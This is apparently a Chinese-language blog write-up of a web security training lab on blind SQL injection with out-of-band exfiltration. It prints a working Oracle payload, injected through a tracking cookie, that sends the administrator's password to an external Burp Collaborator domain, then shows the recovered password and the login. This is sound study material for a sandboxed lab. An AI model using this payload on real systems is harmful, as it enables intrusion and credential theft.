Lab17_ Blind SQL injection with out-of-band data exfiltration

文章目录

前言:

实验室标题为:

带外数据泄露的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

该数据库包含一个名为users的表,其中的列名为username和password。您需要利用SQL盲目注入漏洞来找出管理员用户的密码。

要解决实验,请以管理员用户身份登录。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示

您可以在 SQL 注入小抄中找到一些有用的有效载荷

进入实验室

依然是商店页面

构造 payload

点击任意分类,打开 burp 进行抓包

复制 Collaborator 中的链接

sql 复制代码
TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.c5inwpad5ruzenww7a6z0gt3dujm7cv1.oastify.com/"> %remote;]>'),'/l') FROM dual--

发送数据包,成功响应

转到 Collaborator 模块,点击 Poll now

可以看到管理员账户的密码被成功外带出来

登录管理员账号

administrator

q1uuvho3ov5renjtp936

成功登录管理员账户

相关推荐
Lingxw_w2 小时前
【网络安全】——大端序(Big-Endian)和小端序(Little-Endian)
安全·web安全
houzhizhen5 小时前
SQL JOIN 关联条件和 where 条件的异同
前端·数据库·sql
码农黛兮_465 小时前
MySQL数据库容灾设计案例与SQL实现
数据库·sql·mysql
野犬寒鸦5 小时前
MySQL索引详解(下)(SQL性能分析,索引使用)
数据库·后端·sql·mysql
赵渝强老师5 小时前
【赵渝强老师】TiDB SQL层的工作机制
数据库·sql·tidb
想躺平的咸鱼干5 小时前
sql的性能分析
数据库·sql
想躺平的咸鱼干7 小时前
SQL语句的优化
数据库·sql
wei_shuo8 小时前
OB Cloud 云数据库V4.3:SQL +AI全新体验
数据库·人工智能·sql
野犬寒鸦11 小时前
MySQL索引使用规则详解:从设计到优化的完整指南
java·数据库·后端·sql·mysql
杨云龙UP15 小时前
SQL Server 中的 GO 及其与其他数据库的对比
数据库·sql·mysql·oracle·sqlserver